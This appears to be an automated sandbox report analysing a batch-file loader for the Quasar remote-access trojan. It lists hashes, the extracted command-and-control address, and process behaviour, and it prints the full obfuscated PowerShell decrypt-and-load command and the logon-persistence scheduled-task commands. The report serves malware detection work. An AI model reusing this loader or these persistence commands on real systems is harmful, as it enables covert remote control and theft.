Analysis
-
max time kernel
28s -
max time network
17s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
17-04-2024 00:30
Static task
static1
General
-
Target
jstr-built.bat
-
Size
1.8MB
-
MD5
6152646d22fa2dfddf47c46a854a04bb
-
SHA1
b0741da3d0cb9d00bc583e5acc11db419fd1de61
-
SHA256
f86ebcd90755fdc28403d64a74ecb638fcae11d51888acca92975cc72902e2d5
-
SHA512
9542dc77487b0abf82bbeff4fd09c35958344855c7825a4b2ce2ee6bd887eb584b7e1c6ea900b1210b130dd70184d5ca66f7a2de7e9e90ef85c403261841840c
-
SSDEEP
49152:lb7smSSlM/MByDVR/aFPxB0snxHsgfM+DLHeD:2
Malware Config
Extracted
quasar
1.4.1
Slave
127.0.0.1:80
0.tcp.ngrok.io :19607
569bd8bb-286e-475a-a912-45ea94f9c8b7
-
encryption_key
1AF7C677BDE3B8255A8F16FC1CA9D8C708B5355F
-
install_name
system32 QC.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Update
-
subdirectory
Windows QC
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1780-120-0x0000018B71CE0000-0x0000018B72004000-memory.dmp family_quasar -
Executes dropped EXE 1 IoCs
Processes:
system32 QC.exepid process 3956 system32 QC.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\Windows QC\system32 QC.exe powershell.exe File opened for modification C:\Windows\system32\Windows QC\system32 QC.exe powershell.exe File opened for modification C:\Windows\system32\Windows QC powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exesystem32 QC.exepid process 1920 powershell.exe 1920 powershell.exe 1920 powershell.exe 216 powershell.exe 216 powershell.exe 216 powershell.exe 1780 powershell.exe 1780 powershell.exe 1780 powershell.exe 3956 system32 QC.exe 3956 system32 QC.exe 3956 system32 QC.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1920 powershell.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeIncreaseQuotaPrivilege 216 powershell.exe Token: SeSecurityPrivilege 216 powershell.exe Token: SeTakeOwnershipPrivilege 216 powershell.exe Token: SeLoadDriverPrivilege 216 powershell.exe Token: SeSystemProfilePrivilege 216 powershell.exe Token: SeSystemtimePrivilege 216 powershell.exe Token: SeProfSingleProcessPrivilege 216 powershell.exe Token: SeIncBasePriorityPrivilege 216 powershell.exe Token: SeCreatePagefilePrivilege 216 powershell.exe Token: SeBackupPrivilege 216 powershell.exe Token: SeRestorePrivilege 216 powershell.exe Token: SeShutdownPrivilege 216 powershell.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeSystemEnvironmentPrivilege 216 powershell.exe Token: SeRemoteShutdownPrivilege 216 powershell.exe Token: SeUndockPrivilege 216 powershell.exe Token: SeManageVolumePrivilege 216 powershell.exe Token: 33 216 powershell.exe Token: 34 216 powershell.exe Token: 35 216 powershell.exe Token: 36 216 powershell.exe Token: SeIncreaseQuotaPrivilege 216 powershell.exe Token: SeSecurityPrivilege 216 powershell.exe Token: SeTakeOwnershipPrivilege 216 powershell.exe Token: SeLoadDriverPrivilege 216 powershell.exe Token: SeSystemProfilePrivilege 216 powershell.exe Token: SeSystemtimePrivilege 216 powershell.exe Token: SeProfSingleProcessPrivilege 216 powershell.exe Token: SeIncBasePriorityPrivilege 216 powershell.exe Token: SeCreatePagefilePrivilege 216 powershell.exe Token: SeBackupPrivilege 216 powershell.exe Token: SeRestorePrivilege 216 powershell.exe Token: SeShutdownPrivilege 216 powershell.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeSystemEnvironmentPrivilege 216 powershell.exe Token: SeRemoteShutdownPrivilege 216 powershell.exe Token: SeUndockPrivilege 216 powershell.exe Token: SeManageVolumePrivilege 216 powershell.exe Token: 33 216 powershell.exe Token: 34 216 powershell.exe Token: 35 216 powershell.exe Token: 36 216 powershell.exe Token: SeIncreaseQuotaPrivilege 216 powershell.exe Token: SeSecurityPrivilege 216 powershell.exe Token: SeTakeOwnershipPrivilege 216 powershell.exe Token: SeLoadDriverPrivilege 216 powershell.exe Token: SeSystemProfilePrivilege 216 powershell.exe Token: SeSystemtimePrivilege 216 powershell.exe Token: SeProfSingleProcessPrivilege 216 powershell.exe Token: SeIncBasePriorityPrivilege 216 powershell.exe Token: SeCreatePagefilePrivilege 216 powershell.exe Token: SeBackupPrivilege 216 powershell.exe Token: SeRestorePrivilege 216 powershell.exe Token: SeShutdownPrivilege 216 powershell.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeSystemEnvironmentPrivilege 216 powershell.exe Token: SeRemoteShutdownPrivilege 216 powershell.exe Token: SeUndockPrivilege 216 powershell.exe Token: SeManageVolumePrivilege 216 powershell.exe Token: 33 216 powershell.exe Token: 34 216 powershell.exe Token: 35 216 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exedescription pid process target process PID 4196 wrote to memory of 344 4196 cmd.exe net.exe PID 4196 wrote to memory of 344 4196 cmd.exe net.exe PID 344 wrote to memory of 212 344 net.exe net1.exe PID 344 wrote to memory of 212 344 net.exe net1.exe PID 4196 wrote to memory of 1920 4196 cmd.exe powershell.exe PID 4196 wrote to memory of 1920 4196 cmd.exe powershell.exe PID 1920 wrote to memory of 216 1920 powershell.exe powershell.exe PID 1920 wrote to memory of 216 1920 powershell.exe powershell.exe PID 1920 wrote to memory of 5016 1920 powershell.exe WScript.exe PID 1920 wrote to memory of 5016 1920 powershell.exe WScript.exe PID 5016 wrote to memory of 2756 5016 WScript.exe cmd.exe PID 5016 wrote to memory of 2756 5016 WScript.exe cmd.exe PID 2756 wrote to memory of 1900 2756 cmd.exe net.exe PID 2756 wrote to memory of 1900 2756 cmd.exe net.exe PID 1900 wrote to memory of 4944 1900 net.exe net1.exe PID 1900 wrote to memory of 4944 1900 net.exe net1.exe PID 2756 wrote to memory of 1780 2756 cmd.exe powershell.exe PID 2756 wrote to memory of 1780 2756 cmd.exe powershell.exe PID 1780 wrote to memory of 1960 1780 powershell.exe schtasks.exe PID 1780 wrote to memory of 1960 1780 powershell.exe schtasks.exe PID 1780 wrote to memory of 3956 1780 powershell.exe system32 QC.exe PID 1780 wrote to memory of 3956 1780 powershell.exe system32 QC.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\jstr-built.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YVUJVzJeFce7f5XhgQpfXWd8gtkJokjuZazm1CcEb0E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2pnv0SMUS2wyUdXSxBRIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LgLaU=New-Object System.IO.MemoryStream(,$param_var); $BFpyT=New-Object System.IO.MemoryStream; $WHHER=New-Object System.IO.Compression.GZipStream($LgLaU, [IO.Compression.CompressionMode]::Decompress); $WHHER.CopyTo($BFpyT); $WHHER.Dispose(); $LgLaU.Dispose(); $BFpyT.Dispose(); $BFpyT.ToArray();}function execute_function($param_var,$param2_var){ $WpAgz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iQVMR=$WpAgz.EntryPoint; $iQVMR.Invoke($null, $param2_var);}$Aneil = 'C:\Users\Admin\AppData\Local\Temp\jstr-built.bat';$host.UI.RawUI.WindowTitle = $Aneil;$ltaKo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Aneil).Split([Environment]::NewLine);foreach ($iIzJm in $ltaKo) { if ($iIzJm.StartsWith(':: ')) { $egjDd=$iIzJm.Substring(3); break; }}$payloads_var=[string[]]$egjDd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_107_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_107.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_107.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_107.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YVUJVzJeFce7f5XhgQpfXWd8gtkJokjuZazm1CcEb0E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2pnv0SMUS2wyUdXSxBRIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LgLaU=New-Object System.IO.MemoryStream(,$param_var); $BFpyT=New-Object System.IO.MemoryStream; $WHHER=New-Object System.IO.Compression.GZipStream($LgLaU, [IO.Compression.CompressionMode]::Decompress); $WHHER.CopyTo($BFpyT); $WHHER.Dispose(); $LgLaU.Dispose(); $BFpyT.Dispose(); $BFpyT.ToArray();}function execute_function($param_var,$param2_var){ $WpAgz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iQVMR=$WpAgz.EntryPoint; $iQVMR.Invoke($null, $param2_var);}$Aneil = 'C:\Users\Admin\AppData\Roaming\startup_str_107.bat';$host.UI.RawUI.WindowTitle = $Aneil;$ltaKo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Aneil).Split([Environment]::NewLine);foreach ($iIzJm in $ltaKo) { if ($iIzJm.StartsWith(':: ')) { $egjDd=$iIzJm.Substring(3); break; }}$payloads_var=[string[]]$egjDd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\system32\Windows QC\system32 QC.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\Windows QC\system32 QC.exe"C:\Windows\system32\Windows QC\system32 QC.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57c063219527a7709eacae3b97197e0ff
SHA1aec6bb765534427b6564f486fb62651076a36f80
SHA25696dfc43d1b2be59f2ba61ec20ca12f9c17f57fe6c4e919883a10387f1065d571
SHA51235580b9f2ee14c2f08762c3f1bf41ceafe1bb20498cc0b8fe74e9f7d6ff81e17f252810764d0ac85f4647b3995c5d5b93351c98bad4921e60c90877c7ea6bb8f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kb3seeto.pvi.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\startup_str_107.batFilesize
1.8MB
MD56152646d22fa2dfddf47c46a854a04bb
SHA1b0741da3d0cb9d00bc583e5acc11db419fd1de61
SHA256f86ebcd90755fdc28403d64a74ecb638fcae11d51888acca92975cc72902e2d5
SHA5129542dc77487b0abf82bbeff4fd09c35958344855c7825a4b2ce2ee6bd887eb584b7e1c6ea900b1210b130dd70184d5ca66f7a2de7e9e90ef85c403261841840c
-
C:\Users\Admin\AppData\Roaming\startup_str_107.vbsFilesize
115B
MD54851185e2828ac223a0da8f32527c000
SHA172f4de01db8b447b4541b21b51f48875fa4112f6
SHA25617ff718e490d784eca93233f4586e6ab60046fd767533b36c34e49de75be9d3a
SHA512ba7e2f797f30715185b0d1fdc6c3a97b3fca415a679a4188c186ae03c43196852bd6d8f619b8b1223e52196539ca979bf27ca574969a2dfe51bdd32cf3d3782a
-
C:\Windows\System32\Windows QC\system32 QC.exeFilesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
memory/216-43-0x00000263F7CF0000-0x00000263F7D00000-memory.dmpFilesize
64KB
-
memory/216-76-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmpFilesize
9.9MB
-
memory/216-58-0x00000263F7CF0000-0x00000263F7D00000-memory.dmpFilesize
64KB
-
memory/216-41-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmpFilesize
9.9MB
-
memory/216-42-0x00000263F7CF0000-0x00000263F7D00000-memory.dmpFilesize
64KB
-
memory/1780-111-0x0000018B71700000-0x0000018B71710000-memory.dmpFilesize
64KB
-
memory/1780-92-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmpFilesize
9.9MB
-
memory/1780-176-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmpFilesize
9.9MB
-
memory/1780-120-0x0000018B71CE0000-0x0000018B72004000-memory.dmpFilesize
3.1MB
-
memory/1780-95-0x0000018B71700000-0x0000018B71710000-memory.dmpFilesize
64KB
-
memory/1780-94-0x0000018B71700000-0x0000018B71710000-memory.dmpFilesize
64KB
-
memory/1920-9-0x00000271332D0000-0x00000271332E0000-memory.dmpFilesize
64KB
-
memory/1920-7-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmpFilesize
9.9MB
-
memory/1920-29-0x0000027133810000-0x0000027133968000-memory.dmpFilesize
1.3MB
-
memory/1920-12-0x00000271334A0000-0x0000027133516000-memory.dmpFilesize
472KB
-
memory/1920-4-0x00000271333F0000-0x0000027133412000-memory.dmpFilesize
136KB
-
memory/1920-117-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmpFilesize
9.9MB
-
memory/1920-23-0x00000271332D0000-0x00000271332E0000-memory.dmpFilesize
64KB
-
memory/1920-8-0x00000271332D0000-0x00000271332E0000-memory.dmpFilesize
64KB
-
memory/1920-28-0x0000027133490000-0x0000027133498000-memory.dmpFilesize
32KB
-
memory/3956-133-0x0000021475C40000-0x0000021475C50000-memory.dmpFilesize
64KB
-
memory/3956-132-0x0000021475C40000-0x0000021475C50000-memory.dmpFilesize
64KB
-
memory/3956-160-0x0000021475EA0000-0x0000021475EDC000-memory.dmpFilesize
240KB
-
memory/3956-130-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmpFilesize
9.9MB
-
memory/3956-178-0x00007FFF9ADA0000-0x00007FFF9B78C000-memory.dmpFilesize
9.9MB